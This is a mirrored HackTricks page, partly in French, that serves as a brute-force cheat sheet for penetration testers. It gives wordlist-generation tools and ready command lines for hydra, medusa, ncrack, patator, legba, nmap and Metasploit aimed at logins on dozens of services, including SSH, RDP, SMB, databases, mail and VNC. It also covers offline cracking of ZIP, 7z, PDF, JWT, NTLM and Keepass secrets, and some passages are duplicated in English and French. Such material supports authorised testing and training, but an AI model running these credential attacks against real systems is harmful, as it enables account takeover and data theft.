Mirrors/hacktricks
2
0
Fork 0
mirror of https://github.com/carlospolop/hacktricks synced 2024-11-23 13:13:41 +00:00
Code Issues Projects Releases Packages Wiki Activity
hacktricks/generic-methodologies-and-resources/brute-force.md

55 KiB
Raw Blame History

Brute Force - Fiche de triche


Utilisez Trickest pour construire facilement et automatiser des workflows alimentés par les outils communautaires les plus avancés au monde.
Accédez dès aujourd'hui :

{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}

Apprenez le piratage AWS de zéro à héros avec htARTE (HackTricks AWS Red Team Expert)!

Autres façons de soutenir HackTricks :

Identifiants par défaut

Recherchez dans Google les identifiants par défaut de la technologie utilisée, ou essayez ces liens :

Créez vos propres dictionnaires

Trouvez autant d'informations que possible sur la cible et générez un dictionnaire personnalisé. Outils qui peuvent aider :

Crunch

crunch 4 6 0123456789ABCDEF -o crunch1.txt #From length 4 to 6 using that alphabet
crunch 4 4 -f /usr/share/crunch/charset.lst mixalpha # Only length 4 using charset mixalpha (inside file charset.lst)

@ Lower case alpha characters
, Upper case alpha characters
% Numeric characters
^ Special characters including spac
crunch 6 8 -t ,@@^^%%

Cewl

Cewl est un outil qui extrait les mots d'un site Web pour générer une liste de mots potentiels pour une attaque de force brute.

cewl example.com -m 5 -w words.txt

CUPP

Générer des mots de passe basés sur vos connaissances de la victime (noms, dates...)

python3 cupp.py -h

Wister

Un outil générateur de listes de mots, qui vous permet de fournir un ensemble de mots, vous donnant la possibilité de créer de multiples variations à partir des mots donnés, créant ainsi une liste de mots unique et idéale à utiliser pour un cible spécifique.

python3 wister.py -w jane doe 2022 summer madrid 1998 -c 1 2 3 4 5 -o wordlist.lst

__          _______  _____ _______ ______ _____
\ \        / /_   _|/ ____|__   __|  ____|  __ \
\ \  /\  / /  | | | (___    | |  | |__  | |__) |
\ \/  \/ /   | |  \___ \   | |  |  __| |  _  /
\  /\  /   _| |_ ____) |  | |  | |____| | \ \
\/  \/   |_____|_____/   |_|  |______|_|  \_\

Version 1.0.3                    Cycurity

Generating wordlist...
[########################################] 100%
Generated 67885 lines.

Finished in 0.920s.

pydictor

Listes de mots


Utilisez Trickest pour construire facilement et automatiser des workflows alimentés par les outils communautaires les plus avancés au monde.
Accédez dès aujourd'hui :

{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}

Services

Classés par ordre alphabétique du nom du service.

AFP

nmap -p 548 --script afp-brute <IP>
msf> use auxiliary/scanner/afp/afp_login
msf> set BLANK_PASSWORDS true
msf> set USER_AS_PASS true
msf> set PASS_FILE <PATH_PASSWDS>
msf> set USER_FILE <PATH_USERS>
msf> run

AJP

Brute Force

Brute force attacks against the AJP protocol can be carried out using tools like Hydra or Burp Suite Intruder. These tools can be used to guess usernames and passwords by systematically trying all possible combinations until the correct one is found.

Force brute

Les attaques par force brute contre le protocole AJP peuvent être effectuées à l'aide d'outils tels que Hydra ou Burp Suite Intruder. Ces outils peuvent être utilisés pour deviner des noms d'utilisateur et des mots de passe en essayant systématiquement toutes les combinaisons possibles jusqu'à ce que la bonne soit trouvée.

nmap --script ajp-brute -p 8009 <IP>

AMQP (ActiveMQ, RabbitMQ, Qpid, JORAM and Solace)

Brute Force

Brute force attacks against AMQP servers are relatively straightforward. The attacker simply tries all possible username and password combinations until a valid one is found. This can be done using tools like Hydra or custom scripts.

Protection

To protect against brute force attacks, it is recommended to:

  • Use strong and complex passwords
  • Implement account lockout mechanisms after a certain number of failed login attempts
  • Monitor login attempts for suspicious activity
  • Limit the number of login attempts allowed
  • Implement multi-factor authentication for an added layer of security

Example

An example of a brute force attack against an AMQP server using Hydra:

hydra -L users.txt -P passwords.txt amqp://target-ip

legba amqp --target localhost:5672 --username admin --password data/passwords.txt [--amql-ssl]

Cassandra

Cassandra est une base de données NoSQL distribuée conçue pour gérer de grandes quantités de données réparties sur de nombreux serveurs sans point de défaillance unique. Les attaques de force brute contre Cassandra peuvent être effectuées en essayant de deviner les identifiants d'authentification, tels que les noms d'utilisateur et les mots de passe, en utilisant des listes de mots courants ou des attaques par dictionnaire. Il est essentiel de mettre en œuvre des mesures de sécurité telles que des politiques de mot de passe robustes et des mécanismes de verrouillage de compte pour protéger Cassandra contre de telles attaques.

nmap --script cassandra-brute -p 9160 <IP>
# legba ScyllaDB / Apache Casandra
legba scylla --username cassandra --password wordlists/passwords.txt --target localhost:9042

CouchDB

Brute Force

Brute force attacks against CouchDB typically involve trying to guess the password for the admin user account. This can be done using tools like Hydra or by writing custom scripts. It's important to note that brute forcing passwords is illegal and unethical without proper authorization.

msf> use auxiliary/scanner/couchdb/couchdb_login
hydra -L /usr/share/brutex/wordlists/simple-users.txt -P /usr/share/brutex/wordlists/password.lst localhost -s 5984 http-get /

Registre Docker

hydra -L /usr/share/brutex/wordlists/simple-users.txt  -P /usr/share/brutex/wordlists/password.lst 10.10.10.10 -s 5000 https-get /v2/

Elasticsearch

Elasticsearch

hydra -L /usr/share/brutex/wordlists/simple-users.txt -P /usr/share/brutex/wordlists/password.lst localhost -s 9200 http-get /

FTP

FTP

hydra -l root -P passwords.txt [-t 32] <IP> ftp
ncrack -p 21 --user root -P passwords.txt <IP> [-T 5]
medusa -u root -P 500-worst-passwords.txt -h <IP> -M ftp
legba ftp --username admin --password wordlists/passwords.txt --target localhost:21

Brute Force Générique HTTP

WFuzz

Authentification de Base HTTP

hydra -L /usr/share/brutex/wordlists/simple-users.txt -P /usr/share/brutex/wordlists/password.lst sizzle.htb.local http-get /certsrv/
# Use https-get mode for https
medusa -h <IP> -u <username> -P  <passwords.txt> -M  http -m DIR:/path/to/auth -T 10
legba http.basic --username admin --password wordlists/passwords.txt --target http://localhost:8888/

HTTP - NTLM

Brute Force

Brute force attacks against NTLM authentication can be performed using tools like Hydra or Medusa. These tools can be used to automate the process of trying different username and password combinations until the correct one is found.

Example Command:

hydra -l <username> -P <passwords_file> <target_ip> http-get / -m / -s <port>

Resources:

Mitigation:

To protect against brute force attacks, it is recommended to implement account lockout policies, use strong and complex passwords, and consider implementing multi-factor authentication.

legba http.ntlm1 --domain example.org --workstation client --username admin --password wordlists/passwords.txt --target https://localhost:8888/
legba http.ntlm2 --domain example.org --workstation client --username admin --password wordlists/passwords.txt --target https://localhost:8888/

HTTP - Post Form

Brute Force

Brute force attacks are a common method used to gain unauthorized access to a system by trying all possible combinations of usernames and passwords until the correct one is found. This technique can be used to exploit weak authentication mechanisms in web applications.

Protection

To protect against brute force attacks, you can implement the following measures:

  1. Account Lockout: Implement a mechanism that locks out an account after a certain number of failed login attempts.
  2. CAPTCHA: Use CAPTCHA challenges to differentiate between human users and automated scripts.
  3. Rate Limiting: Limit the number of login attempts from a single IP address within a specific time frame.
  4. Strong Password Policy: Enforce a strong password policy that includes requirements such as minimum length, complexity, and expiration.

By implementing these protection measures, you can significantly reduce the risk of a successful brute force attack on your system.

hydra -L /usr/share/brutex/wordlists/simple-users.txt -P /usr/share/brutex/wordlists/password.lst domain.htb  http-post-form "/path/index.php:name=^USER^&password=^PASS^&enter=Sign+in:Login name or password is incorrect" -V
# Use https-post-form mode for https

Pour https vous devez changer de "http-post-form" à "https-post-form"

HTTP - CMS -- (W)ordpress, (J)oomla or (D)rupal or (M)oodle

cmsmap -f W/J/D/M -u a -p a https://wordpress.com
# Check also https://github.com/evilsocket/legba/wiki/HTTP

IMAP

Brute force attacks against IMAP are typically carried out using the LOGIN command. The attacker sends multiple login attempts using different username and password combinations until the correct one is found. This can be automated using tools like Hydra or Medusa.

Les attaques par force brute contre IMAP sont généralement effectuées en utilisant la commande LOGIN. L'attaquant envoie plusieurs tentatives de connexion en utilisant différentes combinaisons de nom d'utilisateur et de mot de passe jusqu'à ce que la bonne soit trouvée. Cela peut être automatisé en utilisant des outils comme Hydra ou Medusa.

hydra -l USERNAME -P /path/to/passwords.txt -f <IP> imap -V
hydra -S -v -l USERNAME -P /path/to/passwords.txt -s 993 -f <IP> imap -V
nmap -sV --script imap-brute -p <PORT> <IP>
legba imap --username user --password data/passwords.txt --target localhost:993

IRC

IRC

IRC

nmap -sV --script irc-brute,irc-sasl-brute --script-args userdb=/path/users.txt,passdb=/path/pass.txt -p <PORT> <IP>

ISCSI

Brute Force

Brute force attacks against iSCSI targets can be performed using tools like Hydra or Nmap. These tools can help in guessing the username and password combinations to gain unauthorized access to iSCSI targets. It is important to use strong and complex passwords to prevent successful brute force attacks.

nmap -sV --script iscsi-brute --script-args userdb=/var/usernames.txt,passdb=/var/passwords.txt -p 3260 <IP>

JWT

JWT

#hashcat
hashcat -m 16500 -a 0 jwt.txt .\wordlists\rockyou.txt

#https://github.com/Sjord/jwtcrack
python crackjwt.py eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1widXNlcm5hbWVcIjpcImFkbWluXCIsXCJyb2xlXCI6XCJhZG1pblwifSJ9.8R-KVuXe66y_DXVOVgrEqZEoadjBnpZMNbLGhM8YdAc /usr/share/wordlists/rockyou.txt

#John
john jwt.txt --wordlist=wordlists.txt --format=HMAC-SHA256

#https://github.com/ticarpi/jwt_tool
python3 jwt_tool.py -d wordlists.txt <JWT token>

#https://github.com/brendan-rius/c-jwt-cracker
./jwtcrack eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1widXNlcm5hbWVcIjpcImFkbWluXCIsXCJyb2xlXCI6XCJhZG1pblwifSJ9.8R-KVuXe66y_DXVOVgrEqZEoadjBnpZMNbLGhM8YdAc 1234567890 8

#https://github.com/mazen160/jwt-pwn
python3 jwt-cracker.py -jwt eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1widXNlcm5hbWVcIjpcImFkbWluXCIsXCJyb2xlXCI6XCJhZG1pblwifSJ9.8R-KVuXe66y_DXVOVgrEqZEoadjBnpZMNbLGhM8YdAc -w wordlist.txt

#https://github.com/lmammino/jwt-cracker
jwt-cracker "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiYWRtaW4iOnRydWV9.TJVA95OrM7E2cBab30RMHrHDcEfxjoYZgeFONFh7HgQ" "abcdefghijklmnopqrstuwxyz" 6

LDAP

LDAP (Lightweight Directory Access Protocol) is a protocol used for accessing and maintaining directory services over a network. It is commonly used for authentication and storing information about users, groups, and devices in a centralized directory.

LDAP

LDAP (Lightweight Directory Access Protocol) est un protocole utilisé pour accéder et maintenir des services de répertoire sur un réseau. Il est couramment utilisé pour l'authentification et le stockage d'informations sur les utilisateurs, les groupes et les appareils dans un répertoire centralisé.

nmap --script ldap-brute -p 389 <IP>
legba ldap --target 127.0.0.1:389 --username admin --password @wordlists/passwords.txt --ldap-domain example.org --single-match

MQTT

Brute Force

Brute force attacks against MQTT brokers involve attempting to guess valid credentials by systematically trying all possible combinations of usernames and passwords. This can be achieved using tools like Hydra or custom scripts.

Mitigation

To protect against brute force attacks on MQTT brokers, consider implementing the following measures:

  1. Strong Credentials: Use complex and unique usernames and passwords to make it harder for attackers to guess.

  2. Account Lockout: Implement account lockout mechanisms to temporarily lock out users after a certain number of failed login attempts.

  3. Rate Limiting: Enforce rate limiting to restrict the number of login attempts within a specific time frame.

  4. Monitoring: Monitor MQTT broker logs for any unusual login activities and investigate any suspicious behavior.

  5. Two-Factor Authentication: Implement two-factor authentication to add an extra layer of security to the authentication process.

By implementing these measures, you can enhance the security of your MQTT broker and protect it against brute force attacks.

ncrack mqtt://127.0.0.1 --user test P /root/Desktop/pass.txt -v
legba mqtt --target 127.0.0.1:1883 --username admin --password wordlists/passwords.txt

Mongo

nmap -sV --script mongodb-brute -n -p 27017 <IP>
use auxiliary/scanner/mongodb/mongodb_login
legba mongodb --target localhost:27017 --username root --password data/passwords.txt

MSSQL

MSSQL

MSSQL

legba mssql --username SA --password wordlists/passwords.txt --target localhost:1433

MySQL

Brute Force

Brute force attacks against MySQL databases can be carried out using tools like Hydra or SQLMap. These tools can help automate the process of trying different username and password combinations until the correct one is found. It is important to note that brute force attacks can be time-consuming and may trigger account lockouts or other security measures if too many failed attempts are made.

# hydra
hydra -L usernames.txt -P pass.txt <IP> mysql

# msfconsole
msf> use auxiliary/scanner/mysql/mysql_login; set VERBOSE false

# medusa
medusa -h <IP/Host> -u <username> -P <password_list> <-f | to stop medusa on first success attempt> -t <threads> -M mysql

#Legba
legba mysql --username root --password wordlists/passwords.txt --target localhost:3306

OracleSQL

Brute Force

Brute force attacks against Oracle databases can be performed using tools like Hydra or custom scripts. These attacks involve trying all possible combinations of usernames and passwords until the correct one is found. It is important to note that brute force attacks can be time-consuming and may trigger account lockout mechanisms if too many failed attempts are made. It is recommended to use strong and complex passwords to mitigate the risk of a successful brute force attack.

patator oracle_login sid=<SID> host=<IP> user=FILE0 password=FILE1 0=users-oracle.txt 1=pass-oracle.txt -x ignore:code=ORA-01017

./odat.py passwordguesser -s $SERVER -d $SID
./odat.py passwordguesser -s $MYSERVER -p $PORT --accounts-file accounts_multiple.txt

#msf1
msf> use admin/oracle/oracle_login
msf> set RHOSTS <IP>
msf> set RPORT 1521
msf> set SID <SID>

#msf2, this option uses nmap and it fails sometimes for some reason
msf> use scanner/oracle/oracle_login
msf> set RHOSTS <IP>
msf> set RPORTS 1521
msf> set SID <SID>

#for some reason nmap fails sometimes when executing this script
nmap --script oracle-brute -p 1521 --script-args oracle-brute.sid=<SID> <IP>

legba oracle --target localhost:1521 --oracle-database SYSTEM --username admin --password data/passwords.txt

Pour utiliser oracle_login avec patator, vous devez installer:

pip3 install cx_Oracle --upgrade

Bruteforce de hachage OracleSQL hors ligne (versions 11.1.0.6, 11.1.0.7, 11.2.0.1, 11.2.0.2, et 11.2.0.3):

nmap -p1521 --script oracle-brute-stealth --script-args oracle-brute-stealth.sid=DB11g -n 10.11.21.30

POP

Brute Force

Brute force attacks are one of the simplest and most common types of attacks. The attacker tries every possible combination of usernames and passwords until the correct one is found. This method is time-consuming but effective, especially against weak passwords.

Dictionary Attack

A dictionary attack is similar to a brute force attack, but instead of trying every possible combination, it uses a predefined list of common passwords. This method is faster than a brute force attack and can be very effective if the target is using a common or weak password.

Rainbow Table Attack

A rainbow table attack is a precomputed table for reversing cryptographic hash functions, usually for cracking password hashes. This method can be very fast and efficient, especially against hashed passwords.

Credential Stuffing

Credential stuffing is the automated injection of breached username/password pairs to gain unauthorized access to user accounts. Attackers use automated tools to test large numbers of credentials against various websites and services to find valid login information.

Hydra

Hydra is a popular password-cracking tool that can perform rapid dictionary and brute-force attacks. It supports multiple protocols and can be used to crack passwords for various services and platforms.

hydra -l USERNAME -P /path/to/passwords.txt -f <IP> pop3 -V
hydra -S -v -l USERNAME -P /path/to/passwords.txt -s 995 -f <IP> pop3 -V

# Insecure
legba pop3 --username admin@example.com --password wordlists/passwords.txt --target localhost:110

# SSL
legba pop3 --username admin@example.com --password wordlists/passwords.txt --target localhost:995 --pop3-ssl

PostgreSQL

Brute Force

Brute force attacks against PostgreSQL databases can be carried out using tools like Hydra or Metasploit. These tools can attempt to log in to a PostgreSQL database by trying different combinations of usernames and passwords until a successful match is found. It is important to use strong and unique passwords to protect against brute force attacks.

hydra -L /root/Desktop/user.txt P /root/Desktop/pass.txt <IP> postgres
medusa -h <IP> U /root/Desktop/user.txt P /root/Desktop/pass.txt M postgres
ncrack v U /root/Desktop/user.txt P /root/Desktop/pass.txt <IP>:5432
patator pgsql_login host=<IP> user=FILE0 0=/root/Desktop/user.txt password=FILE1 1=/root/Desktop/pass.txt
use auxiliary/scanner/postgres/postgres_login
nmap -sV --script pgsql-brute --script-args userdb=/var/usernames.txt,passdb=/var/passwords.txt -p 5432 <IP>
legba pgsql --username admin --password wordlists/passwords.txt --target localhost:5432

PPTP

Vous pouvez télécharger le paquet .deb à installer depuis https://http.kali.org/pool/main/t/thc-pptp-bruter/

sudo dpkg -i thc-pptp-bruter*.deb #Install the package
cat rockyou.txt | thc-pptp-bruter u <Username> <IP>

RDP

Brute Force

Brute force attacks against RDP servers are common and can be mitigated by implementing strong password policies, account lockout policies, and using multi-factor authentication. Tools such as Hydra, Ncrack, and Crowbar can be used to automate the brute force process. It is important to monitor RDP logs for any suspicious login attempts and to regularly audit RDP server configurations for security vulnerabilities.

ncrack -vv --user <User> -P pwds.txt rdp://<IP>
hydra -V -f -L <userslist> -P <passwlist> rdp://<IP>
legba rdp --target localhost:3389 --username admin --password data/passwords.txt [--rdp-domain <RDP_DOMAIN>] [--rdp-ntlm] [--rdp-admin-mode] [--rdp-auto-logon]

Redis

Redis is an open-source, in-memory data structure store that can be used as a database, cache, and message broker. It supports various data structures such as strings, hashes, lists, sets, and more. Redis does not have built-in support for authentication, so it is crucial to secure it properly. Common security issues with Redis include unauthorized access and data exposure. It is essential to use strong passwords, firewall rules, and access controls to protect Redis instances from unauthorized access.

msf> use auxiliary/scanner/redis/redis_login
nmap --script redis-brute -p 6379 <IP>
hydra P /path/pass.txt redis://<IP>:<PORT> # 6379 is the default
legba redis --target localhost:6379 --username admin --password data/passwords.txt [--redis-ssl]

Rexec

Brute Force

Brute force attacks against Rexec can be carried out using tools like Hydra or Ncrack. These tools can be used to systematically try all possible username and password combinations until the correct one is found. It is important to note that brute force attacks can be time-consuming and resource-intensive, so they should be used with caution and only when other methods of access have been exhausted.

Mitigation

To mitigate brute force attacks against Rexec, it is recommended to implement strong password policies, such as using complex passwords and enforcing account lockout policies after a certain number of failed login attempts. Additionally, implementing multi-factor authentication can add an extra layer of security to prevent unauthorized access. Regularly monitoring logs for any suspicious login activity can also help detect and respond to brute force attacks in a timely manner.

hydra -l <username> -P <password_file> rexec://<Victim-IP> -v -V

Rlogin

Brute Force

Brute force attacks against the rlogin service can be performed using tools like Hydra or Medusa. These tools can automate the process of trying different username and password combinations until the correct one is found.

Protection

To protect against brute force attacks on rlogin, it is recommended to:

  • Use strong and unique passwords
  • Implement account lockout policies
  • Monitor login attempts for unusual activity
hydra -l <username> -P <password_file> rlogin://<Victim-IP> -v -V

Rsh

Brute Force

Brute force attacks consist of systematically checking all possible keys or passwords until the correct one is found. This method is often used when the key space is small enough to be easily searched. Brute force attacks can be time-consuming but are almost always successful if given enough time.

Tools
  • Hydra
  • Medusa
  • Ncrack
Techniques
  • Dictionary Attack
  • Hybrid Attack
  • Rainbow Table Attack
hydra -L <Username_list> rsh://<Victim_IP> -v -V

http://pentestmonkey.net/tools/misc/rsh-grind

Rsync

nmap -sV --script rsync-brute --script-args userdb=/var/usernames.txt,passdb=/var/passwords.txt -p 873 <IP>

RTSP

RTSP

hydra -l root -P passwords.txt <IP> rtsp

SFTP

Force brute

La force brute est une technique utilisée pour tenter toutes les combinaisons possibles de mots de passe jusqu'à ce que le bon soit trouvé. C'est une méthode couramment utilisée pour attaquer les services SFTP.

legba sftp --username admin --password wordlists/passwords.txt --target localhost:22
# Try keys from a folder
legba sftp --username admin --password '@/some/path/*' --ssh-auth-mode key --target localhost:22

SNMP

SNMP

msf> use auxiliary/scanner/snmp/snmp_login
nmap -sU --script snmp-brute <target> [--script-args snmp-brute.communitiesdb=<wordlist> ]
onesixtyone -c /usr/share/metasploit-framework/data/wordlists/snmp_default_pass.txt <IP>
hydra -P /usr/share/seclists/Discovery/SNMP/common-snmp-community-strings.txt target.com snmp

SMB

Brute Force

Brute force attacks against SMB services are common and can be performed using tools like Hydra, Medusa, or Metasploit. These tools allow an attacker to try different username and password combinations until the correct one is found. It is important to use strong and complex passwords to mitigate the risk of a successful brute force attack.

Dictionary Attack

In addition to brute force attacks, dictionary attacks can also be used against SMB services. In a dictionary attack, the attacker uses a list of commonly used passwords or words from a dictionary to try to gain unauthorized access to the SMB service. It is crucial to use unique and less predictable passwords to defend against dictionary attacks.

nmap --script smb-brute -p 445 <IP>
hydra -l Administrator -P words.txt 192.168.1.12 smb -t 1
legba smb --target share.company.com --username admin --password data/passwords.txt [--smb-workgroup <SMB_WORKGROUP>] [--smb-share <SMB_SHARE>]

SMTP

SMTP (Simple Mail Transfer Protocol) is a communication protocol for email transmission. It is widely used for sending emails over the Internet. In a brute-force attack against an SMTP server, an attacker tries to guess valid usernames and passwords to gain unauthorized access. This can be done using automated tools that systematically try different combinations until the correct one is found. It is important for organizations to implement security measures such as account lockout policies and strong password requirements to protect against brute-force attacks on SMTP servers.

hydra -l <username> -P /path/to/passwords.txt <IP> smtp -V
hydra -l <username> -P /path/to/passwords.txt -s 587 <IP> -S -v -V #Port 587 for SMTP with SSL
legba smtp --username admin@example.com --password wordlists/passwords.txt --target localhost:25 [--smtp-mechanism <mech>]

SOCKS

CHAUSSETTES

nmap  -vvv -sCV --script socks-brute --script-args userdb=users.txt,passdb=/usr/share/seclists/Passwords/xato-net-10-million-passwords-1000000.txt,unpwndb.timelimit=30m -p 1080 <IP>
legba socks5 --target localhost:1080 --username admin --password data/passwords.txt
# With alternative address
legba socks5 --target localhost:1080 --username admin --password data/passwords.txt --socks5-address 'internal.company.com' --socks5-port 8080

SQL Server

Brute Force

Brute force attacks against SQL Server can be performed using tools like Hydra, Ncrack, or custom scripts. These tools can help automate the process of trying different combinations of usernames and passwords until the correct one is found. It is important to note that brute force attacks can be time-consuming and may trigger account lockouts or alarms on the target system. It is recommended to use brute force attacks responsibly and with proper authorization.

#Use the NetBIOS name of the machine as domain
crackmapexec mssql <IP> -d <Domain Name> -u usernames.txt -p passwords.txt
hydra -L /root/Desktop/user.txt P /root/Desktop/pass.txt <IP> mssql
medusa -h <IP> U /root/Desktop/user.txt P /root/Desktop/pass.txt M mssql
nmap -p 1433 --script ms-sql-brute --script-args mssql.domain=DOMAIN,userdb=customuser.txt,passdb=custompass.txt,ms-sql-brute.brute-windows-accounts <host> #Use domain if needed. Be careful with the number of passwords in the list, this could block accounts
msf> use auxiliary/scanner/mssql/mssql_login #Be careful, you can block accounts. If you have a domain set it and use USE_WINDOWS_ATHENT

SSH

SSH

hydra -l root -P passwords.txt [-t 32] <IP> ssh
ncrack -p 22 --user root -P passwords.txt <IP> [-T 5]
medusa -u root -P 500-worst-passwords.txt -h <IP> -M ssh
patator ssh_login host=<ip> port=22 user=root 0=/path/passwords.txt password=FILE0 -x ignore:mesg='Authentication failed'
legba ssh --username admin --password wordlists/passwords.txt --target localhost:22
# Try keys from a folder
legba ssh --username admin --password '@/some/path/*' --ssh-auth-mode key --target localhost:22

Clés SSH faibles / PRNG prévisible de Debian

Certains systèmes présentent des failles connues dans la graine aléatoire utilisée pour générer du matériel cryptographique. Cela peut entraîner une réduction drastique de l'espace des clés qui peut être brute-forcé avec des outils tels que snowdroppe/ssh-keybrute. Des ensembles de clés faibles pré-générées sont également disponibles, comme g0tmi1k/debian-ssh.

STOMP (ActiveMQ, RabbitMQ, HornetQ et OpenMQ)

Le protocole textuel STOMP est un protocole de messagerie largement utilisé qui permet une communication et une interaction transparentes avec des services de file d'attente de messages populaires tels que RabbitMQ, ActiveMQ, HornetQ et OpenMQ. Il offre une approche normalisée et efficace pour échanger des messages et effectuer diverses opérations de messagerie.

legba stomp --target localhost:61613 --username admin --password data/passwords.txt

Telnet

Telnet est un protocole de communication utilisé pour se connecter à des appareils distants sur un réseau. Il est souvent utilisé pour l'administration à distance des appareils réseau. Les attaques de force brute contre Telnet consistent à essayer de deviner les identifiants de connexion en essayant différentes combinaisons de noms d'utilisateur et de mots de passe. Ces attaques peuvent être automatisées à l'aide d'outils spécialisés.

hydra -l root -P passwords.txt [-t 32] <IP> telnet
ncrack -p 23 --user root -P passwords.txt <IP> [-T 5]
medusa -u root -P 500-worst-passwords.txt -h <IP> -M telnet

legba telnet \
--username admin \
--password wordlists/passwords.txt \
--target localhost:23 \
--telnet-user-prompt "login: " \
--telnet-pass-prompt "Password: " \
--telnet-prompt ":~$ " \
--single-match # this option will stop the program when the first valid pair of credentials will be found, can be used with any plugin

VNC

Brute Force

Brute forcing VNC involves trying all possible username and password combinations until a successful login is found. Tools like Hydra and Medusa can be used for this purpose.

Protection

To protect against brute force attacks on VNC, it is recommended to use strong, complex passwords and implement account lockout policies after a certain number of failed login attempts. Additionally, using VPNs or restricting VNC access to specific IP addresses can add an extra layer of security.

hydra -L /root/Desktop/user.txt P /root/Desktop/pass.txt -s <PORT> <IP> vnc
medusa -h <IP> u root -P /root/Desktop/pass.txt M vnc
ncrack -V --user root -P /root/Desktop/pass.txt <IP>:>POR>T
patator vnc_login host=<IP> password=FILE0 0=/root/Desktop/pass.txt t 1 x retry:fgep!='Authentication failure' --max-retries 0 x quit:code=0
use auxiliary/scanner/vnc/vnc_login
nmap -sV --script pgsql-brute --script-args userdb=/var/usernames.txt,passdb=/var/passwords.txt -p 5432 <IP>
legba vnc --target localhost:5901 --password data/passwords.txt

#Metasploit
use auxiliary/scanner/vnc/vnc_login
set RHOSTS <ip>
set PASS_FILE /usr/share/metasploit-framework/data/wordlists/passwords.lst

Winrm

Winrm (Windows Remote Management) est un protocole de gestion à distance utilisé pour l'administration des systèmes Windows.

crackmapexec winrm <IP> -d <Domain Name> -u usernames.txt -p passwords.txt


Utilisez Trickest pour construire facilement et automatiser des workflows alimentés par les outils communautaires les plus avancés au monde.
Accédez dès aujourd'hui :

{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}

Local

Bases de données de craquage en ligne

Consultez ceci avant d'essayer de brute force un Hash.

ZIP

#sudo apt-get install fcrackzip
fcrackzip -u -D -p '/usr/share/wordlists/rockyou.txt' chall.zip

zip2john file.zip > zip.john
john zip.john

#$zip2$*0*3*0*a56cb83812be3981ce2a83c581e4bc4f*4d7b*24*9af41ff662c29dfff13229eefad9a9043df07f2550b9ad7dfc7601f1a9e789b5ca402468*694b6ebb6067308bedcd*$/zip2$
hashcat.exe -m 13600 -a 0 .\hashzip.txt .\wordlists\rockyou.txt
.\hashcat.exe -m 13600 -i -a 0 .\hashzip.txt #Incremental attack

Attaque par force brute de texte en clair connu

Vous devez connaître le texte en clair (ou une partie du texte en clair) d'un fichier contenu à l'intérieur du zip chiffré. Vous pouvez vérifier les noms de fichiers et la taille des fichiers contenus à l'intérieur d'un zip chiffré en exécutant : 7z l encrypted.zip
Téléchargez bkcrack depuis la page des versions.

# You need to create a zip file containing only the file that is inside the encrypted zip
zip plaintext.zip plaintext.file

./bkcrack -C <encrypted.zip> -c <plaintext.file> -P <plaintext.zip> -p <plaintext.file>
# Now wait, this should print a key such as 7b549874 ebc25ec5 7e465e18
# With that key you can create a new zip file with the content of encrypted.zip
# but with a different pass that you set (so you can decrypt it)
./bkcrack -C <encrypted.zip> -k 7b549874 ebc25ec5 7e465e18 -U unlocked.zip new_pwd
unzip unlocked.zip #User new_pwd as password

7z

7z

cat /usr/share/wordlists/rockyou.txt | 7za t backup.7z

#Download and install requirements for 7z2john
wget https://raw.githubusercontent.com/magnumripper/JohnTheRipper/bleeding-jumbo/run/7z2john.pl
apt-get install libcompress-raw-lzma-perl
./7z2john.pl file.7z > 7zhash.john

PDF

Brute Force

Brute force attacks consist of systematically checking all possible keys or passwords until the correct one is found. This method is usually used when the password is unknown and there is no other way to obtain it. Brute force attacks can be time-consuming but are often effective.

Protection

To protect against brute force attacks, it is important to use strong and complex passwords that are not easily guessable. Additionally, implementing account lockout policies after a certain number of failed login attempts can help prevent brute force attacks.

apt-get install pdfcrack
pdfcrack encrypted.pdf -w /usr/share/wordlists/rockyou.txt
#pdf2john didn't work well, john didn't know which hash type was
# To permanently decrypt the pdf
sudo apt-get install qpdf
qpdf --password=<PASSWORD> --decrypt encrypted.pdf plaintext.pdf

Mot de passe propriétaire PDF

Pour craquer un mot de passe propriétaire PDF, consultez ceci : https://blog.didierstevens.com/2022/06/27/quickpost-cracking-pdf-owner-passwords/

JWT

git clone https://github.com/Sjord/jwtcrack.git
cd jwtcrack

#Bruteforce using crackjwt.py
python crackjwt.py eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1widXNlcm5hbWVcIjpcImFkbWluXCIsXCJyb2xlXCI6XCJhZG1pblwifSJ9.8R-KVuXe66y_DXVOVgrEqZEoadjBnpZMNbLGhM8YdAc /usr/share/wordlists/rockyou.txt

#Bruteforce using john
python jwt2john.py eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1widXNlcm5hbWVcIjpcImFkbWluXCIsXCJyb2xlXCI6XCJhZG1pblwifSJ9.8R-KVuXe66y_DXVOVgrEqZEoadjBnpZMNbLGhM8YdAc > jwt.john
john jwt.john #It does not work with Kali-John

Craquage NTLM

Format:USUARIO:ID:HASH_LM:HASH_NT:::
john --wordlist=/usr/share/wordlists/rockyou.txt --format=NT file_NTLM.hashes
hashcat -a 0 -m 1000 --username file_NTLM.hashes /usr/share/wordlists/rockyou.txt --potfile-path salida_NT.pot

Keepass

Brute Force

Brute force attacks are a common way to gain unauthorized access to a Keepass database. Attackers use automated tools to try all possible combinations of passwords until the correct one is found. This method can be time-consuming but is effective if the password is weak.

Protection

To protect against brute force attacks, it is essential to use a strong and unique password for your Keepass database. Additionally, enabling two-factor authentication can add an extra layer of security to prevent unauthorized access. Regularly updating your passwords and keeping your Keepass software up to date can also help mitigate the risk of brute force attacks.

sudo apt-get install -y kpcli #Install keepass tools like keepass2john
keepass2john file.kdbx > hash #The keepass is only using password
keepass2john -k <file-password> file.kdbx > hash # The keepass is also using a file as a needed credential
#The keepass can use a password and/or a file as credentials, if it is using both you need to provide them to keepass2john
john --wordlist=/usr/share/wordlists/rockyou.txt hash

Keberoasting

Keberoasting est une technique d'attaque qui cible les services Kerberos pour extraire des tickets de service et les attaquer hors ligne.

